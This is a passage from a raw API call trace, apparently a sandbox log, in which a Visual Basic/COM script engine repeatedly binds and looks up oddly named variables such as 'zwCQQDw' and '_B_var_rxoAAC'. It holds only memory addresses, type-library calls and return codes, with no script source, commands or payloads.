pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.754] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d56, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zwCQQDw") returned 8 [0069.754] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zwCQQDw", lHashVal=0x1047ed, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.754] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.754] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81d56 | out: _Dst=0x67c2d40) returned 0x0 [0069.754] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zwCQQDw") returned 0x104b71 [0069.754] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_zwCQQDw" | out: _Dst="_B_var_zwCQQDw") returned 0x0 [0069.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_zwCQQDw") returned 15 [0069.754] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.754] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_zwCQQDw", lHashVal=0x104b71, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.754] IUnknown:Release (This=0x665ba50) returned 0xd [0069.754] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.754] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_zwCQQDw", lHashVal=0x104b71, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.754] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.754] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.754] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_zwCQQDw", lHashVal=0x104b71, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.755] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.755] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.755] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_zwCQQDw", lHashVal=0x104b71, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.755] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.755] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.755] IUnknown:Release (This=0x665ba50) returned 0xd [0069.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8710ce, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_zwCQQDw") returned 15 [0069.755] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zwCQQDw", lHashVal=0x104b71, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x51005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x51005100000000, pDummy=0x0) returned 0x0 [0069.755] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81d56 | out: _Dst=0x144ec0) returned 0x0 [0069.755] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cXDDxXA", lHashVal=0x109223, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d2e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cXDDxXA") returned 8 [0069.755] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cXDDxXA", lHashVal=0x109223, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d2e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cXDDxXA") returned 8 [0069.755] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cXDDxXA", lHashVal=0x109223, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.755] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cXDDxXA") returned 0x109223 [0069.755] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="cXDDxXA" | out: _Dst="cXDDxXA") returned 0x0 [0069.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="cXDDxXA") returned 8 [0069.755] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.755] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="cXDDxXA", lHashVal=0x109223, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.755] IUnknown:Release (This=0x665ba50) returned 0xd [0069.755] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.755] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="cXDDxXA", lHashVal=0x109223, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.756] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.756] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.756] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="cXDDxXA", lHashVal=0x109223, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.756] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.756] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.756] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="cXDDxXA", lHashVal=0x109223, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.756] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d2e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="cXDDxXA") returned 8 [0069.756] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cXDDxXA", lHashVal=0x109223, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.756] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.756] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81d2e | out: _Dst=0x67c2d40) returned 0x0 [0069.756] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cXDDxXA") returned 0x1095a7 [0069.756] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_cXDDxXA" | out: _Dst="_B_var_cXDDxXA") returned 0x0 [0069.756] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_cXDDxXA") returned 15 [0069.756] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.756] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_cXDDxXA", lHashVal=0x1095a7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.756] IUnknown:Release (This=0x665ba50) returned 0xd [0069.756] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.756] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_cXDDxXA", lHashVal=0x1095a7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.756] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.756] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.756] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_cXDDxXA", lHashVal=0x1095a7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.756] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.756] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.756] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_cXDDxXA", lHashVal=0x1095a7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.756] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.756] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.756] IUnknown:Release (This=0x665ba50) returned 0xd [0069.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8710fe, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_cXDDxXA") returned 15 [0069.757] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cXDDxXA", lHashVal=0x1095a7, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x78004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x78004400000000, pDummy=0x0) returned 0x0 [0069.757] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b81d2e | out: _Dst=0x144ec0) returned 0x0 [0069.757] ITypeComp:RemoteBind (in: This=0x665ba60, szName="rxoAAC", lHashVal=0x10c3a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81da6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="rxoAAC") returned 7 [0069.757] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="rxoAAC", lHashVal=0x10c3a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81da6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="rxoAAC") returned 7 [0069.757] ITypeComp:RemoteBind (in: This=0x665bd30, szName="rxoAAC", lHashVal=0x10c3a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.757] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rxoAAC") returned 0x10c3a3 [0069.757] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="rxoAAC" | out: _Dst="rxoAAC") returned 0x0 [0069.757] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="rxoAAC") returned 7 [0069.757] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.757] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="rxoAAC", lHashVal=0x10c3a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.757] IUnknown:Release (This=0x665ba50) returned 0xd [0069.757] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.757] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="rxoAAC", lHashVal=0x10c3a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.757] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.757] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.757] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="rxoAAC", lHashVal=0x10c3a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.757] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.758] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.758] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="rxoAAC", lHashVal=0x10c3a3, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.758] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81da6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="rxoAAC") returned 7 [0069.758] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="rxoAAC", lHashVal=0x10c3a3, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.758] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.758] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81da6 | out: _Dst=0x67c2d40) returned 0x0 [0069.758] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_rxoAAC") returned 0x103e0d [0069.758] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_rxoAAC" | out: _Dst="_B_var_rxoAAC") returned 0x0 [0069.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_rxoAAC") returned 14 [0069.758] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.758] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_rxoAAC", lHashVal=0x103e0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.758] IUnknown:Release (This=0x665ba50) returned 0xd [0069.758] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.758] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_rxoAAC", lHashVal=0x103e0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.758] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.758] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.758] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_rxoAAC", lHashVal=0x103e0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.758] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.758] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.758] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_rxoAAC", lHashVal=0x103e0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.758] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.758] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.758] IUnknown:Release (This=0x665ba50) returned 0xd [0069.758] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87112e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_rxoAAC") returned 14 [0069.758] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_rxoAAC", lHashVal=0x103e0d, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.759] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81da6 | out: _Dst=0x144ec0) returned 0x0 [0069.759] ITypeComp:RemoteBind (in: This=0x665ba60, szName="u44UABDU", lHashVal=0x109283, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81dce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="u44UABDU") returned 9 [0069.759] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="u44UABDU", lHashVal=0x109283, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81dce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="u44UABDU") returned 9 [0069.759] ITypeComp:RemoteBind (in: This=0x665bd30, szName="u44UABDU", lHashVal=0x109283, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.759] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="u44UABDU") returned 0x109283 [0069.759] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="u44UABDU" | out: _Dst="u44UABDU") returned 0x0 [0069.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="u44UABDU") returned 9 [0069.759] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.759] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="u44UABDU", lHashVal=0x109283, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.759] IUnknown:Release (This=0x665ba50) returned 0xd [0069.759] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.759] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="u44UABDU", lHashVal=0x109283, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.759] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.759] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.759] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="u44UABDU", lHashVal=0x109283, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.759] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.759] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.759] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="u44UABDU", lHashVal=0x109283, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.759] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.759] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81dce, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="u44UABDU") returned 9 [0069.760] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="u44UABDU", lHashVal=0x109283, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.760] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.760] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b81dce | out: _Dst=0x67c2d40) returned 0x0 [0069.760] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_u44UABDU") returned 0x106a0c [0069.760] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_u44UABDU" | out: _Dst="_B_var_u44UABDU") returned 0x0 [0069.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_u44UABDU") returned 16 [0069.760] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.760] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_u44UABDU", lHashVal=0x106a0c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.760] IUnknown:Release (This=0x665ba50) returned 0xd [0069.760] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.760] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_u44UABDU", lHashVal=0x106a0c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.760] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.760] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.760] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_u44UABDU", lHashVal=0x106a0c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.760] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.760] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.760] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_u44UABDU", lHashVal=0x106a0c, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.760] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.760] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.760] IUnknown:Release (This=0x665ba50) returned 0xd [0069.760] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87115e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_u44UABDU") returned 16 [0069.760] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_u44UABDU", lHashVal=0x106a0c, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x41005500000000, pDummy=0x0) returned 0x0 [0069.760] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b81dce | out: _Dst=0x144ec0) returned 0x0 [0069.760] ITypeComp:RemoteBind (in: This=0x665ba60, szName="MA4DC_", lHashVal=0x106d6a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81dfa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="MA4DC_") returned 7 [0069.761] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MA4DC_", lHashVal=0x106d6a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81dfa, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="MA4DC_") returned 7 [0069.761] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MA4DC_", lHashVal=0x106d6a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.761] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MA4DC_") returned 0x106d6a [0069.761] strcpy_s (in: 